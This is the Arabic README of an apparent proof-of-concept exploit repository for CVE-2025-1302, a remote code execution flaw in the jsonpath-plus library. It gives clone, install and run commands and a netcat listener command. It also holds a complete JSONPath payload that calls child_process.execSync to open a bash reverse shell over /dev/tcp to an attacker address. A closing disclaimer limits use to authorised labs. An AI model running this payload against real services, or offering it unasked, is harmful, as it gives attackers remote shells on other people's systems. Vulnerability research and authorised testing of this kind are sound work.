
استغلال PoC وعرض توضيحي لخادم ضعيف لـ CVE-2025-1302 في jsonpath-plus.
اسم سكريبت الـPoC: poc.py
سكريبت استغلال لإثبات المفهوم للثغرة CVE-2025-1302، والتي تستهدف ثغرة تنفيذ أوامر عن بعد (RCE) في مكتبة jsonpath-plus. عند تشغيله على نقطة نهاية خدمة ضعيفة، يحاول السكريبت تشغيل تنفيذ أوامر عن بعد عبر حمولة JSONPath وإنشاء شل عكسي (reverse shell) إلى المهاجم.
--method أو --no-fallback.{ip} و {port} كقوالب.tqdm أثناء حلقات التأخير والحمولات.--output.استنساخ هذا المستودع:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
تثبيت التبعيات (يتطلب بايثون 3.6+):
pip install -r requirements.txt
تشغيل مستمع على جهاز المهاجم (استبدل المنفذ حسب الحاجة):
nc -lvnp 9999
تشغيل الـPoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: ملف يحتوي على حمولة JSONPath واحدة في كل سطر. استخدم العناصر النائبة {ip} و {port}.--delay: الثواني التي يجب الانتظار قبل إرسال الحمولات (يظهر العد التنازلي).--method: فرض POST أو GET أو AUTO (الافتراضي).--no-fallback: اختصار لتخطي أي إعادة محاولة GET (مكافئ لـ --method POST).--output: المسار لحفظ سجل المحاولات بصيغة JSON.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
استخدم هذا السكريبت فقط في بيئات مختبرية خاضعة للرقابة ضد أنظمة تمتلكها أو لديك إذن صريح لاختبارها. قد يكون إساءة الاستخدام غير قانونية وغير أخلاقية.